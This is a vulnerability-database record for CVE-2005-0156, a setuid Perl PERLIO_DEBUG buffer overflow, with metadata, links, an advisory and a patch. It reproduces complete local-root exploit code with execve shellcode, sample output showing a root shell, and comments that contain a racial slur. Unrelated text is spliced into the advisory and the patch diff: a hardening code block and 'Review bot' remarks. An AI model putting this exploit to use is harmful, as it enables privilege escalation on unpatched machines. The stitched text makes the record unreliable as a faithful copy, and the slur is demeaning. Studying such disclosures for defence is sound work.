CVE-2005-0156
CVSS 2.1
Published: 2005-02-07 00:00:00
Revised: 2016-10-17 23:08:04
NMCOEP    

[Original] Buffer overflow in the PerlIO implementation in Perl 5.8.0, when installed with setuid support (sperl), allows local users to execute arbitrary code by setting the PERLIO_DEBUG variable and executing a Perl script whose full pathname contains a long directory tree.


[CNNVD] Perl SuidPerl Multiple Local Vulnerabilities (CNNVD-200502-006)

        Perl is a popular cross-platform programming language.
        Some Perl scripts have a problem in handling the PERLIO_DEBUG variable; a local attacker can exploit this vulnerability to corrupt system files or carry out a buffer overflow attack.
        An attacker can overwrite any file by setting the PERLIO_DEBUG environment variable and invoking any setuid-root Perl script: the file that PERLIO_DEBUG points to is then overwritten with Perl debug messages. The attacker cannot precisely control the file contents, but can corrupt important data.
        In addition, if PERLIO_DEBUG is set, invoking a setuid-perl script with an overly long path can trigger a buffer overflow; carefully crafted input may allow arbitrary commands to be executed with root privileges.

- CVSS (Base Score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [may cause system files to be modified]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

cpe:/o:redhat:enterprise_linux:3.0::advanced_server
cpe:/o:trustix:secure_linux:1.5  Trustix Secure Linux 1.5
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:trustix:secure_linux:2.2  Trustix Secure Linux 2.2
cpe:/a:larry_wall:perl:5.8.4.2.3
cpe:/a:larry_wall:perl:5.8.4.5
cpe:/o:suse:suse_linux:8.0::i386
cpe:/o:trustix:secure_linux:2.1  Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0  Trustix Secure Linux 2.0
cpe:/o:redhat:fedora_core:core_3.0
cpe:/a:larry_wall:perl:5.8.4.1
cpe:/o:ibm:aix:5.2  IBM AIX 5.2
cpe:/a:larry_wall:perl:5.8.4.2
cpe:/o:ubuntu:ubuntu_linux:4.1::ia64
cpe:/a:larry_wall:perl:5.8.4.3
cpe:/a:larry_wall:perl:5.8.4.4
cpe:/o:ibm:aix:5.3  IBM AIX 5.3
cpe:/o:redhat:enterprise_linux:3.0::workstation_server
cpe:/a:sgi:propack:3.0  SGI ProPack 3.0
cpe:/o:redhat:enterprise_linux_desktop:3.0  Red Hat Desktop 3.0
cpe:/a:larry_wall:perl:5.8.4
cpe:/a:larry_wall:perl:5.8.3
cpe:/a:larry_wall:perl:5.8.0
cpe:/a:larry_wall:perl:5.8.1
cpe:/o:ubuntu:ubuntu_linux:4.1::ppc
cpe:/o:suse:suse_linux:8.1  SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:9.0  SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8.0  SuSE SuSE Linux 8.0
cpe:/o:suse:suse_linux:9.2  SuSE SuSE Linux 9.2
cpe:/o:suse:suse_linux:8.2  SuSE SuSE Linux 8.2
cpe:/o:suse:suse_linux:9.1  SuSE SuSE Linux 9.1

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:10803  Buffer overflow in the PerlIO implementation in Perl 5.8.0, when installed with setuid support (sperl), allows local users to execute arbitr...
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for more technical details on detection.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0156
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0156
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-006
(Official data source) CNNVD

- Other Links and Resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=001056
(UNKNOWN)  CONECTIVA  CLSA-2006:1056
http://fedoranews.org/updates/FEDORA--.shtml
(UNKNOWN)  FEDORA  FLSA-2006:152845
http://marc.info/?l=bugtraq&m=110737149402683&w=2
(UNKNOWN)  BUGTRAQ  20050202 [USN-72-1] Perl vulnerabilities
http://marc.info/?l=full-disclosure&m=110779721503111&w=2
(UNKNOWN)  FULLDISC  20050207 DMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG
http://www.digitalmunition.com/DMA%5B2005-0131b%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0131b].txt
http://www.gentoo.org/security/en/glsa/glsa-200502-13.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200502-13
http://www.mandriva.com/security/advisories?name=MDKSA-2005:031
(UNKNOWN)  MANDRAKE  MDKSA-2005:031
http://www.redhat.com/support/errata/RHSA-2005-103.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:103
http://www.redhat.com/support/errata/RHSA-2005-105.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:105
http://www.securityfocus.com/bid/12426
(VENDOR_ADVISORY)  BID  12426
http://www.trustix.org/errata/2005/0003/
(VENDOR_ADVISORY)  TRUSTIX  2005-0003
http://xforce.iss.net/xforce/xfdb/19208
(VENDOR_ADVISORY)  XF  perl-perliodebug-bo(19208)

- Vulnerability Information

Perl SuidPerl Multiple Local Vulnerabilities
Low  Buffer overflow
2005-02-07 00:00:00 2005-10-20 00:00:00
Local

- Advisories and Patches

        The vendor has released an upgrade patch to fix this security issue; patch download links:
        http://lwn.net/Alerts/122393/?format=printable
        http://lwn.net/Alerts/195043
        http://lwn.net/Alerts/123652/?format=printable
        http://security.gentoo.org/glsa/glsa-200502-13.xml

- Vulnerability Information (791)

Setuid perl PerlIO_Debug() overflow (EDBID:791)
linux local
2005-02-07 Verified
0 Kevin Finisterre
N/A
/*
 * Copyright Kevin Finisterre
 *
 * Setuid perl PerlIO_Debug() overflow
 *
 * Tested on Debian 3.1 perl-suid 5.8.4-5 
 *
 * (11:07:20) *corezion:* who is tha man with tha masta plan?
 * (11:07:36) *corezion:* a nigga with a buffer overrun
 * (11:07:39) *corezion:* heh
 * (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
 *
 * cc -o ex_perl2 ex_perl2.c -std=c99
 * 
 * kfinisterre@jdam:~$ ./ex_perl2
 * Dirlen: 1052
 * Charlie Murphy!!!@#@
 * sh-2.05b# id
 * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root) 
 * 
 */

#define _XOPEN_SOURCE 600       /* declares setenv(), mkdir(), chdir(), getcwd() under -std=c99 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* defined after main(); prototype needed so C99 does not reject the implicit declaration */
char *putLong(char *ptr, long value);

int main(int argc, char **argv)
{
	int len = 23;
	int count = 5;
	char malpath[10000];
	char tmp[256];
	char *filler;
	char *ptr;
	char *args[2];

	(void)argc;
	(void)argv;

	unsigned char code[] = 
	/*
	  0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>
	  Linux/IA32 0xff-less execve() shellcode.  
	 */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

        // setuid(0) - fix for redhat based machines
	"\x31\xdb"                      // xorl         %ebx,%ebx
	"\x8d\x43\x17"                  // leal         0x17(%ebx),%eax
	"\xcd\x80"                      // int          $0x80

	"\x89\xe6"                          /* movl %esp, %esi          */
	"\x83\xc6\x30"                      /* addl $0x30, %esi         */
	"\xb8\x2e\x62\x69\x6e"              /* movl $0x6e69622e, %eax   */
	"\x40"                              /* incl %eax                */
	"\x89\x06"                          /* movl %eax, (%esi)        */
	"\xb8\x2e\x73\x68\x21"              /* movl $0x2168732e, %eax   */
	"\x40"                              /* incl %eax                */
	"\x89\x46\x04"                      /* movl %eax, 0x04(%esi)    */
	"\x29\xc0"                          /* subl %eax, %eax          */
	"\x88\x46\x07"                      /* movb %al, 0x07(%esi)     */
	"\x89\x76\x08"                      /* movl %esi, 0x08(%esi)    */
	"\x89\x46\x0c"                      /* movl %eax, 0x0c(%esi)    */
	"\xb0\x0b"                          /* movb $0x0b, %al          */
	"\x87\xf3"                          /* xchgl %esi, %ebx         */
	"\x8d\x4b\x08"                      /* leal 0x08(%ebx), %ecx    */
	"\x8d\x53\x0c"                      /* leal 0x0c(%ebx), %edx    */
	"\xcd\x80"                          /* int $0x80                */;


	chdir("/tmp/");

	// each iteration adds one more filler directory level, so the script's
	// full path ends up longer than the fixed 1024-byte buffer in PerlIO_debug()
	// do one less char than usual for RedHat 
	filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";
	
	for (int x = 0; x < 4; x = x + 1)
	{
		mkdir(filler, 0777);
		chdir(filler);
		// do one less char than usual for RedHat 
		count = count + 255;		
	}

	// last path component: `len` filler bytes followed by three copies of the
	// saved frame address; zero tmp first so strcat() below finds a terminator
	memset(tmp, 0, sizeof(tmp));
        memset(tmp, 0x41, len);  
	count = count + len;

        ptr = tmp + len;
        ptr = putLong(ptr, 0xbffffb6a); // frame 11 ebp
        ptr = putLong(ptr, 0xbffffb6a); 
        ptr = putLong(ptr, 0xbffffb6a);

	strcat(tmp, "/");
	mkdir(tmp, 0777);
	chdir(tmp);

	printf("Dirlen: %d\n", count); 

	// dummy setuid perl script; only its #! line (sperl) matters
	FILE *perlsploit;
	char perldummyfile[] = {
                "#!/usr/bin/sperl5.8.4\n"
                "# \n"
                "# Be proud that perl(1) may proclaim: \n"
                "#   Setuid Perl scripts are safer than C programs ...\n"
                "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
        };

        if (!(perlsploit = fopen("take_me.pl", "w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(perldummyfile, sizeof(perldummyfile) - 1, 1, perlsploit);
        fclose(perlsploit);

	getcwd(malpath, sizeof(malpath));
	strcat(malpath, "/");
	strcat(malpath, "take_me.pl");
	printf("Charlie Murphy!!!@#@\n");

	chmod(malpath, 0755);
	// PERLIO_DEBUG turns on the logging that formats the (overlong) script path
        setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
	setenv("PERL5LIB", (const char *) code, 1);
	args[0] = malpath;
	args[1] = NULL;
	execv(malpath, args);

	perror("execv");
	return 1;
}
/*
 * put a address in mem, for little-endian
 *
 */
char *
putLong(char *ptr, long value)
{
    *ptr++ = (char) ((value >> 0) & 0xff);
    *ptr++ = (char) ((value >> 8) & 0xff);
    *ptr++ = (char) ((value >> 16) & 0xff);
    *ptr++ = (char) ((value >> 24) & 0xff);

    return ptr;
}

// milw0rm.com [2005-02-07]
		

- Vulnerability Information (F36092)

ex_perl2b.c (PacketStormID:F36092)
2005-02-22 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,overflow,local,root
CVE-2005-0156

Local root exploit for the PerlIO package that makes use of a buffer overflow in PERLIO_DEBUG.

- Vulnerability Information (F36091)

DMA-2005-0131b.txt (PacketStormID:F36091)
2005-02-22 00:00:00
Kevin Finisterre  digitalmunition.com
advisory,overflow,local,root,perl
CVE-2005-0156

The PerlIO package for Perl 5.8.0 suffers from a flaw where PERLIO_DEBUG is susceptible to a buffer overflow that allows for local root compromise when using setuid perl.

DMA[2005-0131b] - 'Setuid Perl PERLIO_DEBUG buffer overflow'
Author: Kevin Finisterre
Vendor: http://dev.perl.org/
Product: 'Perl 5.8.x - sperl'
References: (CAN-2005-0156)
http://www.digitalmunition.com/DMA[2005-0131b].txt
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0156
https://rt.perl.org/rt3/Ticket/Display.html?id=33990 (guest/guest)
http://www.mail-archive.com/perl5-changes@perl.org/msg10733.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10734.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10736.html
http://www.mail-archive.com/perl5-changes@perl.org/msg10737.html

Description: 
Perl is a stable, cross platform programming language. It is used for mission critical projects 
in the public and private sectors and is widely used to program web applications of all needs.

In the July 18, 2002 highlights for Perl 5.8.0 there was a 'New IO Implementation' added called
PerlIO. The new PerlIO implementation was described as both a portable stdio implementation
(at the source code level) and a flexible new framework for richer I/O behaviours. 

As an attacker I would definitely say that PerlIO has some rich behavior. Two vulnerabilities 
were located in the PerlIO package that can allow an attacker to take root on a machine that 
makes use of setuid perl aka sperl. The first vulnerability was outlined in DMA[2005-0131a], 
details on the second vulnerability will be explained below.

Perl provides debug access to PerlIO via an environment variable known as PERLIO_DEBUG. The perl
documentation tells us that if PERLIO_DEBUG is set to the name of a file or device then certain 
operations of the PerlIO sub-system will be logged to that file in append mode. When the data is 
logged to the file specified by PERLIO_DEBUG the path of the perl script is also logged. If perl
is called all by itself the path should show up as "-". If however a perl script is run via its 
full path, then the entire path will be logged. The following sample run demonstrates the logging 
functionality. 

kfinisterre@kfinisterre01:/tmp$ cat > test.pl
#!/usr/bin/sperl5.8.4
print "test\n";
^C
kfinisterre@kfinisterre01:/tmp$ chmod +x test.pl
kfinisterre@kfinisterre01:/tmp$ export PERLIO_DEBUG=/tmp/test
kfinisterre@kfinisterre01:/tmp$ ./test.pl
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@kfinisterre01:/tmp$ cat /tmp/test
./test.pl:0 define unix 0x4013a5e0
./test.pl:0 define raw 0x4013a560
./test.pl:0 define perlio 0x4013a6e0
./test.pl:0 define stdio 0x4013a660
./test.pl:0 define crlf 0x4013a7e0
./test.pl:0 define mmap 0x4013a860
./test.pl:0 define utf8 0x4013a460
./test.pl:0 define pop 0x4013a3e0
./test.pl:0 define bytes 0x4013a4e0
./test.pl:0 unix => 0x4013a5e0
./test.pl:0 Pushing perlio
./test.pl:0 perlio => 0x4013a6e0
./test.pl:0 Layer 1 is perlio
./test.pl:0 openn(perlio,'(null)','Ir',0,0,0,(nil),0,(nil))
...

The function responsible for logging the PerlIO data contains an unbounded call to sprintf()
as you can see below. 

in perlio.c:

   if (dbg > 0) {
        dTHX;
#ifdef USE_ITHREADS
        /* Use fixed buffer as sv_catpvf etc. needs SVs */
        char buffer[1024];
        char *s;
        STRLEN len;
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
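The two findings on this page, PERLIO_DEBUG being honoured inside a setuid process and the unbounded `sprintf()` of the script path into the fixed 1024-byte `buffer`, can be illustrated with a small bounded re-implementation. The block below is an added example, not Perl's own code and not part of the advisory: `perlio_debug_allowed` mirrors the uid/euid gate that the vendor patch later adds, `unbounded_prefix_overflows` measures what the original `sprintf()` would have written without performing the write, and `format_debug_line` is a bounded replacement for the prefix-plus-`vsprintf()` pair. The function names and the constructed 1299-byte path in `main` are assumptions for illustration.

```c
/* Added example, not Perl's own code: a bounded version of the PerlIO_debug
 * prefix formatting, a check for the unbounded case, and the uid/euid gate
 * for PERLIO_DEBUG. Function names are hypothetical. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define DEBUG_BUF 1024   /* same fixed buffer size as in perlio.c */
#define PATH_KEEP 40     /* keep at most 40 bytes of the script path, as "%.40s" does */

/* Mirrors the vendor patch's condition: the PERLIO_DEBUG file may only be
 * opened when the process is not tainted and real ids equal effective ids,
 * i.e. it is not running setuid or setgid. Returns 1 when allowed. */
int perlio_debug_allowed(int tainting, uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    return !tainting && uid == euid && gid == egid;
}

/* Measures, without writing anything, how many bytes the original
 * sprintf(buffer, "%s:%ld ", script, line) would have produced. Returns 1
 * when that plus the terminating NUL would not fit in the 1024-byte buffer,
 * which is exactly what a very deep directory tree causes. */
int unbounded_prefix_overflows(const char *script, long line)
{
    int n = snprintf(NULL, 0, "%s:%ld ", script ? script : "(none)", line);
    return n < 0 || n >= DEBUG_BUF;
}

/* Hardened replacement for the prefix + vsprintf pair: every write is limited
 * to `size`, the path is cut to PATH_KEEP bytes, and the return value is the
 * length the full line would have had, so a result >= size means truncation. */
size_t format_debug_line(char *buf, size_t size, const char *script, long line,
                         const char *fmt, ...)
{
    va_list ap;
    int n;
    size_t len;

    if (size == 0)
        return 0;
    if (!script)
        script = "(none)";
    n = snprintf(buf, size, "%.*s:%ld ", PATH_KEEP, script, line);
    if (n < 0) {
        buf[0] = '\0';
        return 0;
    }
    len = (size_t)n;
    if (len >= size)            /* prefix alone filled the buffer */
        return len;
    va_start(ap, fmt);
    n = vsnprintf(buf + len, size - len, fmt, ap);
    va_end(ap);
    return n < 0 ? len : len + (size_t)n;
}

int main(void)
{
    /* Constructed input: a script path of 1299 'A' bytes, standing in for the
     * deep directory tree described in the advisory. */
    char longpath[1300];
    char buf[DEBUG_BUF];
    size_t need;

    memset(longpath, 'A', sizeof(longpath) - 1);
    longpath[sizeof(longpath) - 1] = '\0';

    printf("unbounded sprintf would overflow: %d\n",
           unbounded_prefix_overflows(longpath, 0));
    need = format_debug_line(buf, sizeof(buf), longpath, 0,
                             "define %s 0x%x", "unix", 0x4013a5e0);
    printf("bounded line (%zu bytes needed): %s\n", need, buf);
    printf("debug allowed for uid 1000 / euid 0: %d\n",
           perlio_debug_allowed(0, 1000, 0, 1000, 1000));
    return 0;
}
```

The return-value convention of `format_debug_line` is the one `snprintf()` itself uses: a caller that wants to refuse truncated debug lines rather than log them compares the result against the buffer size before writing.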

We can trigger this vulnerability by placing a perl script in a very long directory tree and 
simply executing it after we have defined PERLIO_DEBUG. ex_perl2.c simulates this behavior. 

kfinisterre@kfinisterre01:~$ cc -o ex_perl2 ex_perl2.c -std=c99
ex_perl2.c: In function `main':
ex_perl2.c:67: warning: implicit declaration of function `putenv'
kfinisterre@kfinisterre01:~$ ltrace -f ./ex_perl2
__libc_start_main(0x8048654, 1, 0xbffff944, 0x8048860, 0x80488c0 <unfinished ...>
chdir("/tmp/")     
mkdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0777) 
chdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...)     
mkdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0777)
chdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) 
mkdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0777) 
chdir("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...)
memset(0xbfffd0c0, 'B', 201) 
strcat("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., "/")  
mkdir("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"..., 0777)
chdir("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"...)
printf("Dirlen: %d\n", 974Dirlen: 974)
fopen("take_me.pl", "w+")  
fwrite("#!/usr/bin/sperl5.8.4\n# \n# Be pr"..., 186, 1, 0x8049d70)   
fclose(0x8049d70)
getcwd(0xbfffd1c0, 10000)
strcat("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "/")
strcat("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "take_me.pl")
printf("running: %s\n", "/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"...) 
chmod("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 0755)  
putenv(0x8048bca, 493, 1, 0x8049d70, 0x752f2123)
system("/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAA"... <unfinished ...>
...
Perl_croak(0x8057b68, 0x8056480, 0, 0, 1 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++


This vulnerability could be exploited to gain root privileges on the machine in question.
kfinisterre@kfinisterre01:~$ ./ex_perl2a
Dirlen: 1048
Charlie Murphy!!!@#@
sh-2.05b# id
uid=0(root) gid=1000(kfinisterre) groups=1000(kfinisterre)

The following patch for this bug was provided by Mandrake care of the vendor-sec list. This patch 
also fixes the bug that is described in DMA[2005-0131a].

Index: perlio.c
===================================================================
--- perlio.c    (revision 4342)
+++ perlio.c    (revision 4346)
@@ -454,7 +454,7 @@
     va_list ap;
     dSYS;
     va_start(ap, fmt);
-    if (!dbg) {
+    if (!dbg && !PL_tainting && PL_uid == PL_euid && PL_gid == PL_egid) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
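Review bot: on the changed `if (!dbg && !PL_tainting && ...)` line, a refused or unset PERLIO_DEBUG leaves `dbg` at 0, so `PerlEnv_getenv("PERLIO_DEBUG")` and the id comparison are re-evaluated on every call into this function rather than once; consider recording the refusal (for example a negative sentinel, which the `dbg > 0` test quoted earlier on this page already ignores) so a setuid process never re-reads the environment. The `PL_uid == PL_euid && PL_gid == PL_egid` gate addresses the append-to-arbitrary-file issue, but it is not a substitute for the length bound in the second hunk: a script run with a long path by an unprivileged user still reaches the fixed-size `buffer`.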
@@ -471,7 +471,7 @@
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
-       sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
+       sprintf(buffer, "%.40s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));
        len = strlen(buffer);
        vsprintf(buffer+len, fmt, ap);
        PerlLIO_write(dbg, buffer, strlen(buffer));
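Review bot: the `%.40s` change bounds only the script path; on the following `vsprintf(buffer+len, fmt, ap)` line the formatted message is still written without a length into the remainder of the 1024-byte `buffer`, so any caller that passes a long string argument through `fmt` can still overrun it. Suggest `vsnprintf(buffer + len, sizeof(buffer) - len, fmt, ap)` and treating a return value of `sizeof(buffer) - len` or more as truncation before the `PerlLIO_write(dbg, buffer, strlen(buffer))` call.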

This bug has been successfully exploited on:
Debian 3.1
Ubuntu 4.10
Redhat 8.0

This is the timeline associated with this bug. 

01/30/2005 09:29 AM - Mail to larry wall, perlbug, vendor-sec et al. 
01/31/2005 04:25 AM - Rafael Garcia-Suarez disabled PERLIO_DEBUG in sperl
01/31/2005 08:31 AM - [perl #33990] [RESOLVED] 
01/31/2005 11:15 AM - perl-5.8.6-bug33990.patch passed on from Mandrake cvs
02/02/2005 05:20 PM - Alternate patch provided nick@ccl4.org

-KF


    

- Vulnerability Information

13452
Perl PERLIO_DEBUG Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

Unknown or Incomplete

- Timeline

2005-02-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete
 

 
